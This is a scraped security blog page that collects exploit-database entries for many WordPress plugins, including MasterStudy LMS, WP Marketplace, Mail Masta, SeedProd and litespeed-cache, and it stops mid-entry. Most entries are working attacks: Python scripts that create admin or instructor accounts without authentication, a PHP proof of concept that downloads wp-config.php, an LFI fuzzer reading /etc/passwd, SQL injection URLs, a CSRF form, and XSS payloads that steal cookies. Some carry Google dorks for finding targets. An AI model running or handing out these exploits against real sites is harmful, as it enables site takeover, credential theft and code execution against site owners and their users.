# Exploit Title: WordPress MDC Private Message Persistent XSS
# Date: 8/20/15
# Exploit Author: Chris Kellum
# Vendor Homepage: http://medhabi.com/
# https://wordpress.org/plugins/mdc-private-message/
# Version: 1.0.0
=====================
Vulnerability Details
=====================
The 'message' field doesn't sanitize input, allowing a less privileged user (Editor, Author, etc.)
to execute an XSS attack against an Administrator.
Proof of Concept:
Place <script>alert('Hello!')</script> in the message field of a private message and then submit.
Open the message and the alert window will fire.
===================
Disclosure Timeline
===================
8/16/15 - Vendor notified.
8/19/15 - Version 1.0.1 released.
8/20/15 - Public Disclosure.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863138715
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339
{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}
# Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
# Google Dork: inurl:/user-public-account
# Date: 2023-09-04
# Exploit Author: Revan Arifio
# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/
# Version: <= 3.0.17
# Tested on: Windows, Linux
# CVE : CVE-2023-4278
import requests
import os
import re
import time
banner = """
_______ ________ ___ ___ ___ ____ _ _ ___ ______ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) |
| | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ <
| |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) |
\_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/
======================================================================================================
|| Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation ||
|| Author : https://github.com/revan-ar ||
|| Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ ||
|| Support : https://www.buymeacoffee.com/revan.ar ||
======================================================================================================
"""
print(banner)
# get nonce
def get_nonce(target):
open_target = requests.get("{}/user-public-account".format(target))
search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
if search_nonce[1] != None:
return search_nonce[1]
else:
print("Failed when getting Nonce :p")
# privielege escalation
def privesc(target, nonce, username, password, email):
req_data = {
"user_login":"{}".format(username),
"user_email":"{}".format(email),
"user_password":"{}".format(password),
"user_password_re":"{}".format(password),
"become_instructor":True,
"privacy_policy":True,
"degree":"",
"expertize":"",
"auditory":"",
"additional":[],
"additional_instructors":[],
"profile_default_fields_for_register":[],
"redirect_page":"{}/user-account/".format(target)
}
start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)
if start.status_code == 200:
print("[+] Exploit Success !!")
else:
print("[+] Exploit Failed :p")
# URL target
target = input("[+] URL Target: ")
print("[+] Starting Exploit")
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
int_version = plugin_version[1].replace(".", "")
time.sleep(1)
if int(int_version) < 3018:
print("[+] Target is Vulnerable !!")
# Credential
email = input("[+] Email: ")
username = input("[+] Username: ")
password = input("[+] Password: ")
time.sleep(1)
print("[+] Getting Nonce...")
get_nonce = get_nonce(target)
# Get Nonce
if get_nonce != None:
print("[+] Success Getting Nonce: {}".format(get_nonce))
time.sleep(1)
# Start PrivEsc
privesc(target, get_nonce, username, password, email)
# ----------------------------------
else:
print("[+] Target is NOT Vulnerable :p")
#!/usr/bin/python
#
# Exploit Name: WP Marketplace 2.4.0 Remote Command Execution
#
# Vulnerability discovered by Kacper Szurek (http://security.szurek.pl)
#
# Exploit written by Claudio Viviani
#
#
#
# --------------------------------------------------------------------
#
# The vulnerable function is located on "wpmarketplace/libs/cart.php" file:
#
# function ajaxinit(){
# if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
# if(function_exists($_POST['execute']))
# call_user_func($_POST['execute'],$_POST);
# else
# echo __("function not defined!","wpmarketplace");
# die();
# }
#}
#
# Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook).
# wpmp_pp_ajax_call() call functions by call_user_func() through POST data:
#
# if (function_exists($_POST['execute']))
# call_user_func($_POST['execute'], $_POST);
# else
# ...
# ...
# ...
#
# $_POST data needs to be an array
#
#
# The wordpress function wp_insert_user is perfect:
#
# http://codex.wordpress.org/Function_Reference/wp_insert_user
#
# Description
#
# Insert a user into the database.
#
# Usage
#
# <?php wp_insert_user( $userdata ); ?>
#
# Parameters
#
# $userdata
# (mixed) (required) An array of user data, stdClass or WP_User object.
# Default: None
#
#
#
# Evil POST Data (Add new Wordpress Administrator):
#
# action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
#
# ---------------------------------------------------------------------
#
# Dork google: index of "wpmarketplace"
#
# Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
# Check if file exists and has readable
def checkfile(file):
if not os.path.isfile(file) and not os.access(file, os.R_OK):
print '[X] '+file+' file is missing or not readable'
sys.exit(1)
else:
return file
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
banner = """
___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | |__|
|::.|:. |
`--- ---'
___ ___ __ __ __
| Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----.
|. | _ | _| <| -__| _| _ | | _ | __| -__|
|. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____|
|: | | |__|
|::.|:. |
`--- ---'
WP Marketplace
R3m0t3 C0d3 Ex3cut10n
(Add WP Admin)
v2.4.0
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('--timeout', action="store", default=10, type="int",
help="[Timeout Value] - Default 10",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)
host = checkurl(options.target)
timeout = options.timeout
print(banner)
socket.setdefaulttimeout(timeout)
username = id_generator()
pwd = id_generator()
body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call',
'execute' : 'wp_insert_user',
'user_login' : username,
'user_pass' : pwd,
'role' : 'administrator'})
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
print "[+] Tryng to connect to: "+host
try:
req = urllib2.Request(host+"/", body, headers)
response = urllib2.urlopen(req)
html = response.read()
if html == "":
print("[!] Account Added")
print("[!] Location: "+host+"/wp-login.php")
print("[!] Username: "+username)
print("[!] Password: "+pwd)
else:
print("[X] Exploitation Failed :(")
except urllib2.HTTPError as e:
print("[X] "+str(e))
except urllib2.URLError as e:
print("[X] Connection Error: "+str(e))
# Exploit Title: WP Marketplace 2.4.0 Arbitrary File Download
# Date: 26-10-2014
# Software Link: https://wordpress.org/plugins/wpmarketplace/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9013 and CVE-2014-9014
1. Description
Anyone can run user defined function because of call_user_func.
File: wpmarketplace\libs\cart.php
function ajaxinit(){
if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
if(function_exists($_POST['execute']))
call_user_func($_POST['execute'],$_POST);
else
echo __("function not defined!","wpmarketplace");
die();
}
}
http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html
2. Proof of Concept
$file = '../../../wp-config.php';
$url = 'http://wordpress-url/';
$user = 'userlogin';
$email = 'useremail@email.email';
$pass = 'password';
$cookie = "/cookie.txt";
$ckfile = dirname(__FILE__) . $cookie;
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");
// Register
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.'?checkout_register=register');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,
array(
'register_form' => 'register',
'reg[user_login]' => $user,
'reg[user_email]' => $email,
'reg[user_pass]' => $pass
));
$content = curl_exec($ch);
if (!preg_match("/success/i", $content)) {
die("Cannot register");
}
// Log in
curl_setopt($ch, CURLOPT_URL, $url.'wp-login.php');
curl_setopt($ch,
CURLOPT_POSTFIELDS,
array(
'log' => $user,
'pwd' => $pass,
'wp-submit' => 'Log%20In'
));
$content = curl_exec($ch);
if (!preg_match('/adminmenu/i', $content)) {
die("Cannot login");
}
// Add subscriber as plugin admin
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
CURLOPT_POSTFIELDS,
array(
'action' => 'wpmp_pp_ajax_call',
'execute' => 'wpmp_save_settings',
'_wpmp_settings[user_role][]' => 'subscriber'
));
$content = curl_exec($ch);
if (!preg_match('/Settings Saved Successfully/i', $content)) {
die("Cannot set role");
}
// Request noonce
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
CURLOPT_POSTFIELDS,
array(
'action' => 'wpmp_pp_ajax_call',
'execute' => 'wpmp_front_add_product'
));
$content = curl_exec($ch);
preg_match('/name="__product_wpmp" value="([^"]+)"/i', $content, $nonce);
if (strlen($nonce[1]) < 2) {
die("Cannot get nonce");
}
// Set file to download
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
CURLOPT_POSTFIELDS,
array(
'__product_wpmp' => $nonce[1],
'post_type' => 'wpmarketplace',
'id' => '123456',
'wpmp_list[base_price]' => '0',
'wpmp_list[file][]' => $file
));
$content = curl_exec($ch);
header("Location: ".$url."?wpmpfile=123456");
3. Solution:
Update to version 2.4.1
https://downloads.wordpress.org/plugin/wpmarketplace.2.4.1.zip
# Exploit Title: Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting
# Date: 2020-06-22
# Vendor Homepage: https://www.seedprod.com/
# Vendor Changelog: https://wordpress.org/plugins/coming-soon/#developers
# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-coming-soon-page-maintenance-mode-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 5.1.1 and below
# CVE : CVE-2020-15038
1. Description
Coming Soon Page, Under Construction & Maintenance Mode by SeedProd is a popular WordPress Plugin with over 1 million active installations. The Headline field under the Page Settings section along with other fields in the plugin settings were found to be vulnerable to stored XSS, which gets triggered when the Coming Soon page is displayed (both in preview mode and live). All WordPress websites using Coming Soon Page, Under Construction & Maintenance Mode by SeedProd version 5.1.1 and below are affected.
2. Proof of Concept
POST /wp-admin/options.php HTTP/1.1
Host: localhost:10004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:10004/wp-admin/admin.php?page=seed_csp4
Content-Type: application/x-www-form-urlencoded
Content-Length: 636
Origin: http://localhost:10004
Connection: close
Cookie: wordpress_7f1e0e8dff8818d1c2f579415daff8c7=jinson%7C1593950372%7C4GRNHaGPf0Fgg4gDEpeoNwijwEWzc3D3eVOlrvXniBi%7Cb9d2e047395f59871a0900e390bbd3d695bc5da3afb334da3d0ef5e8bf0c2f1b; wordpress_a024acb662ffd2f30d002a94ed1ea95c=jinson%7C1592914794%7CCgXYWBOtHL4ad8HOoBAQX49z08S9twTuGYVtVWqIbFp%7C01f69b63f0019268e8a42d1cefd95cd451b8ae990337af407b1caf9cb3fa99e5; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_7f1e0e8dff8818d1c2f579415daff8c7=jinson%7C1593950372%7C4GRNHaGPf0Fgg4gDEpeoNwijwEWzc3D3eVOlrvXniBi%7Cf1c8b238e06829673fea45a383730caae8b84cd0ac08b6f11fee65cd94cb8c16; PHPSESSID=44b22ef78b270abbd2351f1d858edb02; wordpress_logged_in_a024acb662ffd2f30d002a94ed1ea95c=jinson%7C1592914794%7CCgXYWBOtHL4ad8HOoBAQX49z08S9twTuGYVtVWqIbFp%7C317cd515fad907c4ae323798cca357f601c29999b20edbe8f9fdad02f35c53f7; wp-settings-time-1=1592745227; cookielawinfo-checkbox-non-necessary=yes; wp-settings-1=imgsize%3Dfull; cookielawinfo-checkbox-necessary=yes
Upgrade-Insecure-Requests: 1
option_page=seed_csp4_settings_content&action=update&_wpnonce=faced0b8ff&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dseed_csp4&seed_csp4_settings_content%5Bstatus%5D=1&seed_csp4_settings_content%5Blogo%5D=&seed_csp4_settings_content%5Bheadline%5D=%3Cscript%3Ealert%28%22Stored+XSS+in+Page+Headline%22%29%3C%2Fscript%3E&seed_csp4_settings_content%5Bdescription%5D=Proof+of+Concept&seed_csp4_settings_content%5Bfooter_credit%5D=0&submit=Save+All+Changes&seed_csp4_settings_content%5Bfavicon%5D=&seed_csp4_settings_content%5Bseo_title%5D=&seed_csp4_settings_content%5Bseo_description%5D=&seed_csp4_settings_content%5Bga_analytics%5D=
3. Timeline
Vulnerability reported to the SeedProd team – June 22, 2020
Version 5.1.2 containing the fix to the vulnerability released – June 24, 2020
# Exploit Title: Wordpress MailChimp Subscribe Forms Remote Code Execution
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/mailchimp-subscribe-sm/
# Software Link: https://downloads.wordpress.org/plugin/mailchimp-subscribe-sm.1.1.zip
# Version: 1.1
# Tested on: Apache 2.2.22, PHP 5.3.10
# OSVDB ID : http://www.osvdb.org/show/osvdb/121081
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7935
# Category: webapps
1. Description
Remote Code Execution via email field.
2. Proof of Concept
POST Request
sm_email=<?php echo 'Current PHP version: '. phpversion();?>&submit=
When the admin user checks the subscibers list, the php code is executed.
3. Solution
Fixed in version 1.2
source: https://www.securityfocus.com/bid/59932/info
The Mail On Update plugin for WordPress is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
Mail On Update 5.1.0 is vulnerable; prior versions may also be affected.
<html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update"; method="post"
class="buttom-primary">
<input name="mailonupdate_mailto" type="hidden" value="example0 () example com
example1 () example com
example2 () example com
example3 () example com
example4 () example com
example5 () example com
example6 () example com
example7 () example com
example8 () example com
example9 () example com
example10 () example com
henri+monkey () nerv fi" />
<input name="submit" type="submit" value="Save"/></form></html>
# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
# Date: 02/18/2017
# Exploit Author: Hanley Shun
# Vendor Homepage: https://wpcore.com/plugin/mail-masta
# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
# Version: 1.0
# Tested on: Kali Linux x64, Ubuntu 14.04 x64
# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]
Mail-Masta SQL Injection
Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated)
GET Parameter: list_id
http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
csvexport.php:
$list_id=$_GET['list_id'];
global $wpdb;
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
$wp_list=$wpdb->get_results($check_sql);
$wp_list_s=$wpdb->get_results($check_list);
Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin)
GET Parameter: filter_list
http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1
view-list.php:
global $wpdb;
$list_id = $_GET['filter_list'];
$masta_list = $wpdb->prefix . "masta_list";
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));
Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin)
POST Parameter: camp_id
http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php
count_of_send.php:
include($_GET['pl']);
global $wpdb;
$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from $masta_reports where camp_id=$camp_id and status=1");
Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin)
POST Parameter: list_id
campaign_save.php:
$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");
POST /wp-admin/admin-ajax.php?id= HTTP/1.1
...snip...
action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
# Exploit Title: WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
# Date: 2021-08-24
# Exploit Author: Matheus Alexandre [Xcatolin]
# Software Link: https://downloads.wordpress.org/plugin/mail-masta.zip
# Version: 1.0
WordPress Plugin Mail Masta is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.
* Make sure to modify the wordlist path to your preferred wordlist. You can also download the one i used at Github:
https://github.com/Xcatolin/Personal-Exploits/
#!/usr/bin/python
# Exploit for the Wordpress plugin mail-masta 1.0 LFI vulnerability
import requests
from requests.exceptions import ConnectionError
class bcolors:
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
ITALIC = '\33[3m'
print(bcolors.BOLD + """\
__ __ _ _ __ __ _
| \/ |__ _(_) |___| \/ |__ _ __| |_ __ _
| |\/| / _` | | |___| |\/| / _` (_-< _/ _` |
|_| |_\__,_|_|_| |_| |_\__,_/__/\__\__,_|
_ _ ___ _ _ ___ _ _
| | ___ __ __ _| | | __(_) |___ |_ _|_ _ __| |_ _ __(_)___ _ _
| |__/ _ \/ _/ _` | | | _|| | / -_) | || ' \/ _| | || (_-< / _ \ ' \
|____\___/\__\__,_|_| |_| |_|_\___| |___|_||_\__|_|\_,_/__/_\___/_||_|
|_ . \_/ _ _ |_ _ |. _
|_)\/. / \(_(_||_(_)||| )
/
""" + bcolors.ENDC)
endpoint = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl="
valid = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
print (bcolors.WARNING + "[+] Insert the target including the WordPress instance:" + bcolors.ENDC)
print (bcolors.ITALIC + "ex: http://target.com/wordpress\n" + bcolors.ENDC)
target = raw_input("~# ")
print (bcolors.WARNING + "[*] Checking if the target is alive..." + bcolors.ENDC)
try:
request = requests.get(target)
except ConnectionError:
print (bcolors.FAIL + "[X] Target not available. Please check the URL you've entered." + bcolors.ENDC)
exit(1)
else:
print (bcolors.OKGREEN + "[!] Target up and running!\n" + bcolors.ENDC)
print (bcolors.WARNING + "[*] Checking if the Mail-Masta endpoint is vulnerable..." + bcolors.ENDC)
try:
response = requests.get(target + valid)
except len(response.content) < 1000 :
print (bcolors.FAIL + "[X] Endpoint not vulnerable." + bcolors.ENDC)
exit(1)
else:
print (bcolors.OKGREEN + "[!] Endpoint vulnerable!\n" + bcolors.ENDC)
print (bcolors.WARNING + "[*] Fuzzing for files in the system..." + bcolors.ENDC)
wordlist='wordlist.txt' ## Change here
lines=open(wordlist, "r").readlines()
for i in range(0, len(lines)):
word=lines[i].replace("\n","")
response = requests.get(target + endpoint + word)
if len(response.content) > 500 :
print (bcolors.OKGREEN + "[!] " + bcolors.ENDC) + "File",word,"found!"
[+] Date: [23-8-2016]
[+] Autor Guillermo Garcia Marcos
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
[+] Title: Mail Masta WP Local File Inclusion
[+] info: Local File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
Source: /inc/lists/csvexport.php:
Line 5: include($_GET['pl']);
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
Source: /inc/lists/csvexport.php
Line 5: include($_GET['pl']);
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.
Typical proof-of-concept would be to load passwd file:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
# # # # #
# Exploit Title: WordPress Plugin Mac Photo Gallery v3.0 - Arbitrary File Download
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/Mac-Photo-Gallery
# Demo: http://www.apptha.com/demo/mac-photo-gallery
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php
# Etc..
# # # # #
# Exploit Title: Wordpress Loco Translate (Version 2.2.1) Plugin LFI
# Google Dork: N/A
# Date: 03 / 26 / 2019
# Exploit Author: Ali S. Ahmad (S4R1N)
# Vendor Homepage: https://localise.biz/
# Software Link: https://wordpress.org/plugins/loco-translate/
# Version: (Version 2.2.1)
# Tested on: Debian GNU/Linux 9 (Docker)
# CVE : N/A
***********************************************************************
Discovered By: Ali S. Ahmad (S4R1N) 03 / 26 / 2019
***********************************************************************
A local file inclusion bug was discovered on the Wordpress Loco Translate (Version 2.2.1) Plugin.
This bug can be exploited by any user who has acces to the plugin with the access levels ranging from subscriber to admin. Exploitation of the bug abuses the template editing fucntionality of the plugin and the file-view action, this allows a user to access any system file and view its contents.
Exploitation can be done via two main methods, either using (..%2F..%2F..%2F..%2Fetc%2Fpasswd) or directly calling the file via file path (/etc/passwd).
***********************************************************************
Tools used :
Attacker OS : Fedora 29
Victim OS : Debian GNU/Linux 9 (running on docker)
Manual Testing tool : Burp Repeater / Browser
***********************************************************************
Proof of Concept (PoC):
Step 1 - Log into Wordpress instance
Step 2 - Make sure the given user has access to the plugin (can be confirmed on by checking the side panel for the Loco Translate Plugin)
Step 3 - Select the theme you would like
Step 4 - Click edit template
Step 5 - Click Source (to view file source code)
Step 6 - In the url bar change path to the file you want to read (something like /etc/passwd), file path will then be visible.
URL : the following should yeild the contents of /etc/passwd /wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view
# Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/localize-my-post/
# CVE: 2018-16299
# DESCRIPTION
# This bug was found in the file: /localize-my-post/ajax/include.php
# include($_REQUEST['file']);
# The parameter "file" it is not sanitized allowing include local files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.
# Local File Inclusion POC:
GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
# Exploit Title: Live Chat Unlimited v2.8.3 Stored XSS Injection
# Google Dork: inurl:"wp-content/plugins/screets-lcx"
# Date: 2019/06/25
# Exploit Author: m0ze
# Vendor Homepage: https://screets.com/
# Software Link: https://codecanyon.net/item/wordpress-live-chat-plugin/3952877
# Version: 2.8.3
# Tested on: Windows 10 / Parrot OS
# CVE : -
Info:
Weak security measures like bad input field data filtering has been
discovered in the «Live Chat Unlimited». Current version of this
premium WordPress plugin is 2.8.3.
PoC:
Go to the demo website https://site.com/try/lcx/night-bird/ and open chat window by clicking on «Open/close» link, then click on «Online mode» to go online. Use your payload inside input field and press [Enter].
Provided exaple payloads working on the admin area, so it's possible to steal admin cookies or force a redirect to any other
website.
Example #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">m0ze
Example #2: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">m0ze
# Exploit Title: WordPress Plugin litespeed-cache 3.6 - 'server_ip' Cross-Site Scripting
# Date: 20-12-2020
# Software Link: https://downloads.wordpress.org/plugin/litespeed-cache.3.6.zip
# Version: litespeed-cache
# Tested on: Windows 10 x64
# Description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins litespeed-cache 3.6
# One parameters(server_ip) have Cross-Site Scripting.
POST /wp-admin/admin.php?page=litespeed-general HTTP/1.1
Host: localhost
Content-Length: 374
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/wp-admin/admin.php?page=litespeed-general
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie:
wordpress_a5beef43d228c89cc1d954ec4fcadda1=admin%7C1609289111%7CM6c2pV6VbnD2OElpSET6Aw3GhKFJBGdgetyfHtqxJkC%7C27d97999284897d8645200c65a7f508dffef6a9184800b2905627ccbd4d71806;
wordpress_test_cookie=WP%20Cookie%20check;
_lscache_vary=9effc614452472ce40565e73d3f4301c;
wordpress_logged_in_a5beef43d228c89cc1d954ec4fcadda1=admin%7C1609289111%7CM6c2pV6VbnD2OElpSET6Aw3GhKFJBGdgetyfHtqxJkC%7Cd7e1a2a77822d410d7ebe2540b88dc68f908a031ceda6e884995ff419bfb6b38;
wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1609116311
Connection: close
LSCWP_CTRL=save-settings&LSCWP_NONCE=af21ea74b2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dlitespeed-general&_settings-enroll%5B%5D=auto_upgrade&auto_upgrade=0&_settings-enroll%5B%5D=api_key&api_key=&_settings-enroll%5B%5D=server_ip&server_ip=%3Cscript%3Ealert%28%27Hoa%27%29%3C%2Fscript%3E&_settings-enroll%5B%5D=news&news=1&litespeed-submit=Save+Changes
#!/usr/bin/env node
const request = require("request")
/**
* Exploit Title: Limit Login Attempts Reloaded by WPChef rate limiter bypass
* Date: 2019-04-08
* Exploit Author: isdampe
* Software Link: https://wordpress.org/plugins/limit-login-attempts-reloaded
* Version: 2.7.4
* Tested on: WordPress 5.1.1
*
* Description
* -----------
*
* The plugin's primary goal is to limit the rate at which an individual can attempt
